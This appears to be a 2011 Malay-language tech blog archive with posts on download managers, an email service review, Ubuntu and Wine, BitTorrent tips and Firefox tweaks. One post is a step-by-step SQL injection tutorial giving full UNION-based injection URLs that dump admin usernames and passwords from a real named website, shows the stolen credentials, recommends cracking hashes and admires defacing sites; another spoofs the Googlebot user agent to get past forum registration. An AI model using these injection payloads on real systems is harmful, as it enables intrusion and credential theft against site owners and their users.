Satu lagi pesanan Mr.Hac, seboleh-bolehnya kurangkan penggunaan perisian versi crack kerana dikhuatiri ia juga telah disuntik dengan keylogger, apatah lagi jika perisian itu adalah keylogger versi crack!

Download Manager Terbaik Untuk Ubuntu (Linux)


Sebelum kita teruskan kepada 'isi' entri, Mr.Hac nak bagitau yang ini adalah hasil penelitian Mr.Hac sendiri, pendapat Mr.Hac sendiri.. Jadi kalau ia bertentangan dengan pendapat anda, anggap ia perkara biasa. Terima kasih.

Mr.Hac dah pun Google berjam-jam lamanya, dan pelbagai pendapat telah Mr.Hac baca dan kaji sendiri. Namun setelah mencuba, ternyata pendapat-pendapat yang diberikan adalah pendirian peribadi dan bukan hasil 'kajian'.. Oleh itu Mr.Hac dapat merumuskan terdapat 3 download manager yang bagus untuk dicuba oleh para pengguna Ubuntu dan ada antaranya kita sudah sedia maklum. Anda perlu tahu Mr.Hac melakukan ujian ini pada kelajuan internet 1mbps (Streamix) dan 1gbps (Office). Oleh itu Mr.Hac melihat download manager mana yang terbaik dalam mengendalikan fail yang sedang dimuat turun serta kelajuan sambungan internet yang digunakan.


Download Manager Terbaik Untuk Ubuntu

1. DownThemAll (DTA)

2. FatRat

3. UGet

Memang terdapat beberapa lagi senarai download manager yang terbaik tetapi Mr.Hac cuma senaraikan 3 sahaja (banyak sangat nanti pening). Secara peribadi Mr.Hac lebih sukakan UGet kerana paparan GUI yang lebih kemas, kelajuan muat turun stabil, dan mudah untuk difahami. Walaupun tidak sehebat IDM, tetapi boleh dikatakan ia mampu menggantikan IDM sekiranya ia diperkemaskan lagi dan ditambah beberapa ciri yang ada pada IDM seperti force downloading (dengan keystroke) serta tetapan sambungan. Apa yang menarik, FatRat serta UGet menyokong protokol BitTorrent dan ini memudahkan kepada peminat Torrent tanpa perlu membuka dua download manager pada waktu yang sama. Rujuk -> Deensokmo
Bagaimanapun dari segi kelajuan, Mr.Hac akui DownThemAll (DTA) adalah pemenangnya!
(Dengan syarat ia digabungkan bersama FireDownload 2.0)

Ciri yang lain sama sahaja pada setiap download manager, iaitu ia melakukan 'acceleration' untuk setiap muat turun. Download Manager ibarat kaunter di kompleks membeli-belah. Jika terdapat 100 orang pembeli yang mahu membayar sedangkan hanya ada satu sahaja kaunter, ia akan melambatkan proses pembayaran sedangkan kesemua pembeli akan keluar melalui satu pintu yang sama. Akan tetapi jika terdapat 100 pembeli dengan 10 kaunter, maka proses pembayaran akan menjadi lebih lancar dan cepat. Inilah perumpamaan 'acceleration' pada download manager.

Mempercepatkan proses muat turun dengan membahagikan fail kepada beberapa bahagian (partition/segmentation) dan memuat turunnya dengan efisien sambil menggunakan mana-mana sumber sambungan yang ada dengan baik. Rujuk -> IDM

Bagaimana dengan anda? Apakah download manager kegemaran anda? Kongsikan bersama para pembaca di sini..

17 August 2011

Review myemail.my : E-mel 1Malaysia


Pertama kali terbaca tentang myemail.my di eins.my, Mr.Hac terus mencuba sendiri e-mel yang telah dibina oleh syarikat Tricubes itu. E-mel yang digelar sebagai e-mel 1Malaysia itu bagaimanapun masih dalam peringkat beta.



Rekabentuk paparan muka hadapan. Penuh dengan warna merah. Menunya tampak ringkas, bersahaja, biasa, tetapi boleh dikatakan kemas dan cantik.
Perlu lebih penambahbaikan supaya paparannya warnanya tidak menjengkelkan mata yang melihat.
TamTam? hah??


Paparan sebelum masuk ke inbox. No Komen..



Paparan dari bahagian inbox.


Ah.. Malasnya nak tulis review pasal myemail.my ni.. Laman e-mel ini perlu banyak penambahbaikan dari segi paparan antaramuka, dari segi pembaikan bugs, kerana ada beberapa kali Mr.Hac masuk ke bahagian inbox, ia mengalami 'technical error' dan tiada sebarang paparan yang keluar. Mr.Hac faham ia masih di peringkat beta, oleh itu Mr.Hac berharap pada peringkat stable akan datang, bugs 'kecil-kecilan' seperti ini sudah diperbaiki. Mr.Hac juga kurang berkenan dengan warna merah yang memenuhi ruang paparan e-mel myemail.my.. Tidak pasti mengapa ia direka sebegitu.

Sedangkan jika kita melihat kepada Gmail, warnanya sangat ringkas tetapi laju, begitu juga dengan Yahoomail rilis terbaru, gabungan warna biru muda yang begitu menenangkan, dan ciri kelajuan pembukaan e-mel juga amat memuaskan hati. Sememangnya anda boleh menukar tema (theme) pada myemail.my, dan ciri inilah yang 'menyelamatkannya'.

Anda akan mendapat ruang penyimpanan sebanyak 25GB selepas siap mendaftar dan mengesahkan pendaftaran melalui e-mel alternatif yang dipilih oleh anda. 25GB, cukup lah? kan? errr.. (cukup ke?)
Pendaftaran akan menggunakan nama yang tertera pada MyKad anda. Ciri ini mungkin kurang disenangi oleh mereka yang inginkan 'kebebasan' dalam komunikasi di internet. So you're no longer anonymous huh? hahah.. Cukuplah kot setakat ni. Hmm..

Setakat ini belum ada lagi komunikasi e-mel yang Mr.Hac lakukan melalui myemail.my. Review ini hanya menyentuh mengenai isu paparannya dan juga bugs yang bakal anda hadapi. Mahu mencubanya sendiri? Sila ke -> myemail.my

15 August 2011

'Jatuh Cinta' Dengan Linux Kerana Terminal!


Sebelum Mr.Hac memulakan entri ini, Mr.Hac ingin memohon ampun dan maaf dari para pembaca yang menghantar e-mel kepada Mr.Hac melalui ruangan 'Hubungi Admin' kerana bertanyakan masalah tentang perisian, komputer, tips, dan sebagainya. Buat masa ini Mr.Hac tidak dapat menjawab semua pertanyaan anda akibat kesibukan di pejabat, tambahan pula bulan Ramadhan ini agak sukar untuk meluangkan masa di depan netbook pada malam hari. Mr.Hac telah menerima lebih dari 100 e-mel terbaru (belum campur yang lama la maknanya) dan kebanyakannya masih belum berjawab lagi. Maaf semua.


Entri ini Mr.Hac tujukan kepada semua pembaca yang selalu bertanyakan kepada Mr.Hac,

"Mr.Hac, susah ke nak pakai Linux ni?"

atau

"Mr.Hac, betul ke semua benda yang kita nak buat dalam Linux perlu guna command?"

atau

"Mr.Hac, Linux ni support ke software Windows?"

OK.ok.. Biarlah Mr.Hac buat kesimpulan untuk semua soalan di atas. Untuk pengetahuan anda, itulah soalan yang sama, yang mula-mula Mr.Hac fikirkan ketika hendak mencuba distro Linux (Ubuntu) dahulu. Namun, atas dasar prinsip yang selalu Mr.Hac pegang, iaitu 'Jangan dengar sangat cakap orang, cuba sendiri dulu', Mr.Hac pun terus memasang sistem operasi Ubuntu, dan sejak dari hari itu terus menjadi pengguna yang setia sehingga sekarang (Ubuntu 11.04).

Jika anda mahu tahu, baris perintah di bawah ialah baris perintah yang pertama Mr.Hac fahamkan
dan hafal!

sudo add-apt-repository ppa:ubuntu-wine/ppa

sudo apt-get update

sudo apt-get install wine

Nota: perintah 'apt-get' sudah boleh digantikan dengan 'apt-fast' yang lebih cepat dan efisien.
Rujuk Menggantikan apt-get dengan apt-fast untuk kepantasan
Wine pula sudah boleh dipasang dengan versi 1.3 (beta, pada masa entri ini ditulis)

Baris perintah di atas digunakan untuk memasang Wine (Windows Emulator), yang secara amnya digunakan untuk memasang perisian Windows pada sistem operasi Linux dan membantu ia untuk berfungsi (not just imitate, but provide compatibility).
Rujuk Wikipedia
Juga anda boleh rujuk di sini untuk mengetahui dua lagi alternatif kepada Wine.

Oleh itu soalan adakah sistem operasi Linux menyokong perisian Windows, jawapannya adalah ya dan tidak. Kerana sememangnya boleh untuk memasang perisian Windows pada Linux, sememangnya ada yang dapat digunakan dengan cemerlang sekali, namun tidak semuanya berjaya digunakan. Ok?

Persoalan susah atau tidak, itu sebenarnya bergantung kepada individu untuk menyesuaikan diri dengan persekitaran ruang kerja atau desktop Linux. Jika anda adalah 'fast learner' tidak wujud soal susah sebab Mr.Hac sendiri bukan dari golongan yang sangat cekap dengan kaedah pembelajaran, tetapi Mr.Hac sudah mampu faham sedikit demi sedikit mengenai Linux.

Jika ada yang meragui kenyataan ini kerana selalu dimomokkan dengan Linux = Command Line, ini adalah sangat tidak benar. Ya, memang sistem operasi Linux banyak bermain dengan baris perintah yang ditaip pada TERMINAL (jika anda pengguna Windows, Terminal ibarat Command). Namun tidak semua perkara dilakukan melaluinya. Sebagai contoh Ubuntu mempunyai 'Ubuntu Software Center', yang membantu para pengguna mencari beribu-ribu jenis perisian percuma serta memasangnya dengan mudah dari situ. Akan tetapi, dalam banyak-banyak perkara yang menarik hari Mr.Hac, ialah penggunaan Terminal! Sebabnya Terminal adalah jauh lebih maju dan berkuasa berbanding dengan Command pada Windows. Pelbagai perkara dapat dilakukan dengan mudah dan cepat seperti memasang perisian, mengemaskini status Twitter, dan sebagainya!

Kerana itu jugalah Mr.Hac begitu menyukai Terminal, sehingga sukar untuk meninggalkan Ubuntu dan beralih ke WIndows 7 kecuali atas sebab-sebab tertentu seperti IDM!
(sesiapa yang dah lama follow blog ni pasti tahu Mr.Hac 'addict' dengan IDM)

Jika anda terasa kurang yakin, kurang keberanian, atau kurang apa sahaja yang menyebabkan anda takut untuk mencuba Linux, Mr.Hac sarankan anda buang perasaan tersebut jauh-jauh, dan buat mereka yang mahu beralih kepada Linux (pengguna baru), disarankan untuk anda mencuba Ubuntu, disebabkan Ubuntu mudah untuk difahami, tidak rumit, dan amat user-friendly. Tidak perlu untuk menyahpasang (uninstall) sistem operasi Windows yang dah sedia ada, anda hanya perlu terus memasang Ubuntu dari dalam Windows lagi, dengan menggunakan Wubi (Ubuntu Windows Installer), dan ini bermakna anda boleh menyahpasang Ubuntu juga dari dalam Windows seperti perisian yang biasa lainnya!

Bagaimana? Teruja dengan saranan Mr.Hac?]
Cubalah sekarang dan berikan pendapat anda!

-> Ubuntu

-> Wubi

Cara/Panduan Memilih Torrent Yang Paling Laju


Bulan puasa ni memang terasa sangat 'lemaunya'.. So.. Mr.Hac harap anda yang menjadi pengunjung setia blog ini boleh memaafkan kami para 'pengepos', atas kelewatan menerbitkan bahan bacaan bermutu untuk anda (kalau kurang mutunya maaf!)

Ini mungkin adalah entri terakhir Mr.Hac.................................. tentang Torrent..
Sila baca entri Mr.Hac tentang Torrent sebelum ini:

-> Pengenalan Kepada BitTorrent/Torrent

-> Torrent Downloader/Client Terbaik

P/S: Penting untuk anda faham teori Torrent dari awal.


Mr.Hac ingin memendekkan entri ini kerana sedang terfikirkan idea untuk menulis entri yang lain. Jadi, berdasarkan tajuk, panduan untuk memilih fail Torrent yang paling laju untuk dimuat turun adalah dengan melihat kepada ratio Seeders dan Peers (Swarm). Jika jumlah ratio Seeders melebihi Peers, maka ia adalah fail Torrent yang patut dipilih, kerana secara teorinya Seeders tidak 'mengambil' bandwidth dengan memuat turun fail, tetapi Seeders 'memberikan' bandwidth atas dasar perkongsian dengan memuat naik kembali fail yang telah dimuat turun.

Kemudian, jika anda menggunakan BitComet, atau uTorrent, apa yang terbaik untuk anda lakukan ialah dengan menjadi Seeders yang berkaliber, iaitu dengan sentiasa memuat naik kembali kesemua fail yang telah anda muat turun dengan cara membiarkan klien anda terbuka lebih lama selepas siap memuat turun. Lebih banyak, lebih lama, lebih baik. Dengan cara ini, uTorrent akan melihat anda memberikan komitmen yang baik lalu menghantar kepada anda bandwidth yang 'sepatutnya'. Tambahan pula klien BitComet menggunakan sistem 'Ranking' untuk menentukan 'siapa anda'. Oleh itu, cuba dapatkan point dan ranking yang terbaik untuk melihat dan mendapatkan kesannya.

Anda perlu fahamkan konsep BitTorrent, kerana ia adalah komuniti 'memberi dan menerima'. Jangan hanya tahu menerima tanpa memberi, kerana ini adalah cara BitTorrent kekal 'hidup'. Apabila anda menjadi Seeders yang berwibawa, komputer dari Trackers tidak akan teragak-agak untuk membantu anda memuat turun apapun fail yang anda inginkan dengan pantas. Walaupun ini cuma satu teori, tetapi kenapa tidak anda buktikan teori ini sendiri? Ada juga yang mengatakan untuk mendapatkan bandwidth yang lebih, dan laju, anda perlu melakukan proses portforwarding. Caranya tidak sama untuk setiap router. Oleh itu anda perlu Google sendiri bagi mendapatkan tutorial yang tepat. Biarpun portforwarding dikatakan tidak banyak membantu (kerana tindakan ISP menyekat port yang selalu digunakan oleh perisian P2P), tetapi sekurang-kurangnya jika ada penambahan kelajuan walaupun sedikit itu sudah lebih dari cukup.

Selain itu, penggunaan VPN dikatakan dapat membantu 'network environment' yang disekat oleh Corporate Firewall seperti Websense, Sonic Wall, dan Barracuda. Bagi kebanyakan penyedia servis rangkaian internet (Internet Service Provider @ ISP) di Malaysia ini, mungkin mereka tidak menyekat dengan agresif, namun tindakan menyekat laman-laman Torrent serta port-port yang selalu digunakan adalah satu tindakan yang menyusahkan. Namun, ia menjadi pemangkin untuk rakyat Malaysia menjadi lebih kreatif dalam mengatasi masalah ini, dan kerana itulah wujudnya entri-entri blog seperti yang sedang anda baca sekarang...

Untuk mendapatkan lebih banyak tips seperti ini (tentang Torrent), rajin-rajinlah Google, dan menyertai mana-mana forum yang berkaitan. Sekian, dan salam hormat.

Asas SQLi - Tutorial S5



kita baca point-point bagi siri kelima ini dahulu

Kumpul Data

- Jadi sekarang anda sudah dapat lihat table yang ada dalam laman tersebut , langkah terakhir ini ialah untuk mengumpul Data daripada table.
- Jadi , perkara asas yang biasanya penggodam lakukan ialah mencari table yang mengandungi maklumat Admin / users bagi membolehkannya mendapatkan maklumat login ( email, username, password dll)
- Gunakan arahan group_concat(table_name) pada no ajaib bagi mengeluarkan maklumat dalam table tersebut.

- Contohnya :
  http://www.contoh.my/index.php?id=1+UNION+SELECT+1,group_concat(table_name),3+from+information_schema.tables--

- Dan gantikan +from+information_schema.tables+where+table_schema=database()-- kat belakang.

Contohnya :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--

- Kali ini anda akan perhatikan folder table yang mengandungi data didalamnya. Contohnya anda lihat table yang bernama " Admin " , sila convert table name " Admin " tersebut kepada HEXADECIMEL
- Setelah anda convert , sila masukkan arahan group_concat(column_name) kat no ajaib tadi ( 2 ).

Contohnya :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,group_concat(column_name),3+from+information_schema.tables+where+table_schema=database()--

 - Dan kemudian tambahkan arahan  +from+information_schema.columns+where+table_name=0xHEXADECIMEL-- . Contohnya table name tadi " Admin " , setelah di convert menjadi 41444D494E . Maka arahan akan jadi seperti berikut :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x41444D494E--

- Sekarang kita berada dalam folder ADMIN , jadi kita akan keluarkan data melalui arahan concat_ws(0x3a,"nama column yang terkandung dlm table ADMIN") . Contohnya table yang ada ialah "username" dan "password" , maka arahan akan jadi seperti berikut :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,concat_ws(0x3a,"username,password"),3+from+information_schema.columns+where+table_name=0x41444D494E--

- Kemudian gantikan arahan belakang kepada +from+Admin-- bagi menjayakan arahan untuk mendapatkan maklumat daripada table ADMIN. Maka arahan akan seperti berikut :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,concat_ws(0x3a,"username,password"),3+from+Admin--

- Dan sekarang anda akan lihat data "username" dan "password" seperti arahan yang kita jalankan.
- Password berkemungkinan besar dalam bentuk hash , jadi anda perlu decrypt untuk mendapatkan plain text nya seterusnya mendapatkan login page admin tersebut.
------------------------------------------------------------------


Biaklah, berbalik pada tutor pada siri yang lepas, setelah diteliti kita dapati table yang kita perlukan bernama tbladmin. Apa yang perlu kita buat lepas ni ialah kita perlu tukarkan perkataan atau nama table tadi kepada nilai HEX (hexadecimal) ataupon nilai ASCII (sebutannya ‘ass-key’... ops...).

Apakah dia ASCII ?
Rujuk disini;  http://en.wikipedia.org/
Sekarang kita dapatkan nilai ASCII atau HEX bagi ‘tbladmin’ dilaman dibawah;

atau

Masukkan kotak pertama dengan nama table, dalam tutor ini kita ambil tbladmin untuk tukar ke ASCII atau ke HEX. Masukkan perkataan seperti dibawah untuk tukar.
tbladmin

setelah dapat ASCII bagi nama table, apa yang kita perlu buat selepas itu ialah buangkan karakter " & # "sekiranaya ada dan tambah tanda koma "," diantara setiap nombor sekiranya tiada .
Ia akan kelihatan seperti ini bagi ASCII:
116,98,108,97,100,109,105,110
dan begini kalau HEX:
74626C61646D696E
Seterusnya tukarkan beberapa perkataan yang terdapat di URL, tukar "table_name" kepada "column_name" dan tukar "information_schema.tables" kepada "information_schema.columns” dan tambahkan diakhir dengan "where table_name=char(nilai ASCII)--” ataupon "where table_name=0x(nilai HEX)--
 
dimana dalam kes ini kita masukkan (nilai ASCII) itu dengan (116,98,108,97,100,109,105,110)-- atau nilai HEX dengan 74626C61646D696E--
URL kita akan kelihatan seperti ini:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--
atau,
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=0x74626C61646D696--
Laman kita akan kelihatan seperti ini:


Yay, sekarang kita dah nampak nama-nama column yang menyimpan data. Langkah seterusnya kita cari column mana yang mungkin menyimpan data yang kita perlukan. Dalam kes ini kita cari column yang bernama  “username" dan "password" atau sesuatu yang seakannya. Nama column mungkin berbeza mengikut cita rasa admin laman tersebut, jadi kena bijak buat pilihan. Bagi kes dalam tutor ini kita dapat senang jer iaitu "username" dan "password".

Lepas dah dapat tengok nama-nama column ni, kita perlu ubah URL kita lagi sekali. Kali ini, kita buang semua selepas nombor column terakhir – dalam kes ini ia nombor 11 (rujuk tutor sebelum ini macam mana kita dapat) dan tambahkan "from tbladmin" diakhir URL dan gantikan "column_name" dengan "concat(username,0x3a,password)”.
0x3a
ialah nilai ASCII bagi tanda “ : ” . ia digunakan untuk memisahkan username dan password .

URL kita kelihatan begini:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin

Maka, akan terpaparlah data seperti di bawah:

Kita Berjaya ! Kita dah dapat username  ishir dan password ishir123
kadang-kadang password di enkrip dengan Hashes. Gunakan HASH Detector dibawah untuk dekrip password. Boleh jugak guna HASH decryptor yang online jika anda mahu.

Download HASH Decryptor

Hah, dah la, dah habis dah tutor ni ! janjang pon dah penat. Hehe gurau jer. 
Alhamdulillah selesai jugak tutorial Asas SQLi ni. kepada korang semua, Selamat mencuba semua yer. Lagi sekali Kredit kepada KenaHack [KH] dan Komuniti Hack diatas tutorial ini. Janjang mohon maaf kalau ade yang tak jelas dalam siri Asas SQLi ni ataupon Janjang tak dapat nak jawap soalan2 korang dalam siri2 lepas. Nak buat camne, penulis ni p on noob jer. Lain la Mr.Hac dengan Analyzer, siap dah deface website  orang lagi.. power tol diorangkan. Kalau tanyer diorang berdua tu mesti dapat jawab punyer la.

Harap-harap ni bukan entri terakhir Janjang, insyaAllah kita jumpe lagi dalam entri akan datang..

12 August 2011

Torrent Downloader/Client Terbaik


Bagi sesiapa yang belum membaca lagi entri Mr.Hac tentang Torrent sebelum ini boleh lah membacanya di sini -> Pengenalan Kepada BitTorrent/Torrent

Untuk pengetahuan anda, Mr.Hac telah mencuba pelbagai klien Torrent/Torrent Downloader tetapi akhirnya Mr.Hac sampai kepada 3 klien yang terbaik iaitu:

1. BitComet

2. Vuze (Dahulunya dikenali sebagai Azureus)

3. Deluge

Tiada nombor 1, 2 atau 3 kerana ketiga-tiganya adalah terbaik. Tetapi, favourite by Mr.Hac ialah BitComet (walaupun BitComet pernah ada isu mengenai eksploitasi seeds untuk mendapatkan kelajuan maksima) kerana BitComet setanding dengan IDM apabila ia menyokong kesemua protokol muat turun (BitTorrent, HTTP, FTP).


Laju? Hmm.. Boleh la.. BitComet vs IDM? Hmm.. Susah nak cakap tu. Sebab masing-masing ada kelebihan. Kalau tengok balik, kelajuan muat turun masing-masing sama je.
Ok. Cukuplah setakat ni. Kita jumpa lagi dalam entri seterusnya. Assalamualaikum..

Pengenalan Kepada BitTorrent/Torrent


Bismillahirrahmanirrahim..

Adakah anda 'kaki Torrent'? Terlebih dahulu biarlah Mr.Hac kenalkan dengan beberapa istilah yang ada dalam 'arena' Torrent. Mr.Hac akan terangkan secara ringkas mengikut pemahaman Mr.Hac sendiri, so.. keep on reading guys..


Apa Itu BitTorrent?

Kerap dikenali sebagai 'BT', ialah satu protokol sambungan internet yang membolehkan pengguna memuat turun fail dengan lebih pantas dan efisien.

Torrent: Sejenis fail metadata, iaitu fail yang mengandungi kesemua maklumat tentang data yang akan dimuat turun.

Seed/Seeder: Mesin (komputer) yang mempunyai fail yang lengkap. Contohnya jika anda sudah selesai memuat turun satu fail, anda biarkan klien Torrent anda kekal terbuka. Selepas itu ia akan mula memuat naik kembali data fail tadi, oleh itu anda adalah Seeder. Ini adalah perkongsian yang baik kerana anda membantu orang lain untuk memperolehi fail yang sama. Anda ibarat satu sumber kepada para pengguna yang lain untuk memperolehi fail yang telah lengkap.

Tracker: Mesin (komputer) yang digunakan oleh BitTorrent untuk mengenalpasti dan menjejak Peers.

Peer: Peers ialah mesin (komputer) yang masing-masing mempunyai fail tetapi dalam keadaan tidak lengkap. Fail tersebut ibarat dalam bentuk pecahan 'puzzle', setiap peer akan berkongsi/bertukar fail yang dimiliki dengan Peers yang lain untuk 'melengkapkan pecahan puzzle' tersebut dengan menggunakan klien Torrent masing-masing.

Lebih banyak istilah untuk difahami oleh anda di sini -> BitTorrent FAQ and Guide

Kenapa Pilih Torrent?

BitTorrent menyelesaikan masalah muat turun yang lambat, dan kadangkala tersekat di pertengahan jalan. Ini kerana setiap orang yang memuat turun fail telah memuat turun dari SATU SUMBER yang sama. Apabila terdapat terlalu ramai yang ingin memuat turun, pelayan akan melakukan kerja yang lebih dan ini boleh membawa kepada 'crash'.

BitTorrent menyelesaikan masalah ini dengan menukarkan setiap pemuat turun kepada SUMBER (Seeds). Dengan cara ini, perkongsian fail menjadi lebih pintar dan pantas kerana apabila terdapat ramai pemuat turun (Peers) yang terlibat, maka kelajuan muat turun juga akan bertambah (secara teorinya, walaupun belum begitu tepat).

Ianya ibarat Seeds memberikan kepada setiap seorang pemuat turun satu pecahan 'puzzle'. Setiap pemuat turun yang telah mendapat satu pecahan ini akan menjadi Peer. Setiap Peer adalah SUMBER dan memberikan/berkongsi pecahan fail yang diperolehi dengan para pemuat turun yang lain, sehinggalah pecahan tersebut menjadi satu fail yang lengkap, lalu Peers bertukar menjadi Seeds.

Download Torrent File -> Seeds -> Downloaders -> Peers -> Tracker -> Provide 'puzzle' file to other Peers when introduced by Tracker -> Complete File -> Become Seed

(Carta alir ni Mr.Hac tulis sendiri.. so buat-buat paham la kalau tak paham.. hehe..)

Jika anda perhatikan kepada carta alir di atas, tidak hairanlah protokol BitTorrent dipanggil sebagai
'Peer-to-Peer' atau 'P2P' File Sharing.

Untuk entri akan datang, InsyaAllah Mr.Hac akan berkongsi tips memilih fail Torrent yang pantas, dan klien Torrent kegemaran Mr.Hac.

Cara Memasuki Forum Tanpa Perlu Mendaftar


Bismillahirrahmanirrahim..

Pernahkah anda ingin memasuki forum tetapi anda hanya mahu membaca info tanpa mahu mendaftar? Ya. Ada sedikit cara yang mudah dan ringkas untuk melakukannya iaitu dengan menukar tetapan 'User Agent' yang lalai (default) kepada 'User Agent' yang tidak perlukan sebarang pendaftaran seperti Google Bot. Jadi jika melawati mana-mana forum, anda boleh terus memasukinya tanpa perlu mendaftar kerana forum itu sudah 'dikaburi' dengan User Agent yang anda gunakan.

Rujuk di sini untuk mengetahui dengan lebih lanjut apa itu User Agent.


Cara Melakukannya:

1. Salin kod di bawah ke dalam notepad dan simpan sebagai useragent.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]@=”Googlebot/2.1″”Compatible”=”+http://www.googlebot.com/bot.html”

Untuk menukar kembali kepada tetapan asal, salin kod di bawah ke dalam notepad dan simpan sebagai defuseragent.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]@=”Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)”

Cara menggunakannya? Anda hanya perlu klik (double click) pada useragent.reg sekiranya anda ingin melayari forum-forum yang memerlukan pendaftaran tersebut dan apabila sudah selesai, klik (double click) pada defuseragent.reg

Kalau tak faham dan tak pandai nak buat, anda boleh muat turun fail registry yang telah
Mr.Hac buatkan -> User Agent Registry Hack

Kepada mereka yang menggunakan pelayar Firefox, anda boleh gunakan Addon User Agent Switcher untuk melakukannya dengan lebih mudah.

Klik -> Firefox User Agent Switcher

Nota: Ada sesetengah forum yang tidak berkesan. Jangan salahkan Mr.Hac pulak.

10 August 2011

Cara Melajukan Firefox


Cara Melajukan Firefox

Mungkin bagi sesetengah 'advance user', bila baca tajuk entri ni rasa macam 'klise' sangat..
"Weh..dah takde entri lain ke ko nak tulis? Lajukan Firefox?"
Ya..Tujuan Mr.Hac tulis ni bukan nak bagi korang-korang yang so called 'advance user' ni baca..tidak sesekali.. Tujuan Mr.Hac tulis entri ini adalah untuk para pemula memahami dengan mudah tips-tips yang dapat membantu mereka ketika diperlukan tanpa perlu merujuk kepada Pakcik Google lagi. Tambahan pula anda boleh bookmark entri ini kerana setiap kali (sekiranya) selepas anda format komputer/laptop/netbook anda dan kembali memasang (install) pelayar web Mozilla Firefox, anda boleh terus mula meringankan, melajukan, dan 'mengemaskan' tetapan Firefox menjadi lebih baik.

Ini adalah tempat rujukan Mr.Hac, jadi jika ada yang tidak lengkap, anda sendiri boleh terus membuat rujukan sendiri di sini -> How To Speed Up Firefox?
P/S: Entri ini akan sentiasa dikemaskini supaya anda semua berpuas hati dengannya.


Tips: Kesemua tips di bawah memerlukan untuk anda menaip 'about:config' pada bar alamat (address bar), dan kemudian tekan Enter. Akan keluar satu laman amaran, klik pada "I'll be carefull, I promise!" 
Anda boleh terus bermain dengan 'bahasa pengaturcaraan' untuk membuat modifikasi terhadap pelayar Firefox anda! Memang wujud pertikaian terhadap cara ini, kerana ada yang mengatakan "Everythings made default for a reason!". Namun bukankan itu tujuan anda belajar, supaya dapat memperbaiki bahagian-bahagian yang 'lompang' untuk menjadi lebih baik?


Mengurangkan Penggunaan RAM oleh ciri cache Firefox

1. Setelah anda menaip 'about:config', tekan Enter, salin dan tampal
(copy and paste) kod entri ini -> browser.sessionhistory.max_total_viewer
2. Tetapkan nilainya kepada '0'.
3. Jika ia tiada, anda boleh klik kanan pada mana-mana ruang kosong, pilih New -> Integer -> salin dan tampal kod di atas -> tetapkan nilai kepada 0


Melajukan Loading Page Laman Yang Dilawati

1. Salin dan tampal kod entri tetapan berikut:
network.http.pipelining  -> ubah tetapan kepada true
network.http.proxy.pipelining -> ubah tetapan kepada true
network.http.pipelining.maxrequests -> ubah tetapan kepada 10-30.

2. Klik kanan pada mana-mana ruang kosong, pilih New -> Integer -> masukkan entri "nglayout.initialpaint.delay" (tanpa pembuka dan penutup kata) dan masukkan nilainya kepada '0'

3. Klik kanan dan pilih New -> Boolean -> masukkan entri network.dns.disableIPv6 dan masukkan nilainya kepada true

4.  Klik kanan dan pilih New -> Boolean -> masukkan entri plugin.expose_full_path dan masukkan nilainya kepada true

5. Klik kanan dan pilih New -> Integer -> masukkan entri content.notify.backoffcount dan masukkan nilainya kepada 5

6. Klik kanan dan pilih New -> Integer -> masukkan entri ui.submenuDelay dan masukkan nilainya
kepada 0

Mengurangkan Penggunaan RAM Kepada 10MB Apabila Firefox Di-Minimize   

Tips ini dapat membantu PC anda dengan mengurangkan penggunaan RAM kepada 10MB apabila Firefox di-minimize.

1. Klik kanan dan pilih New -> Boolean -> masukkan entri config.trim_on_minimize dan masukkan nilainya kepada true

Sekarang anda hanya perlu restart Firefox dan rasakan perubahannya. Terdapat banyak lagi kod entri yang berada dalam pelbagai blog. Ini merupakan sebahagian kecil darinya. Jika anda rajin, anda boleh membuat eksplorasi sendiri terhadap tetapan Firefox seperti di atas. Sekian dahulu buat masa ini.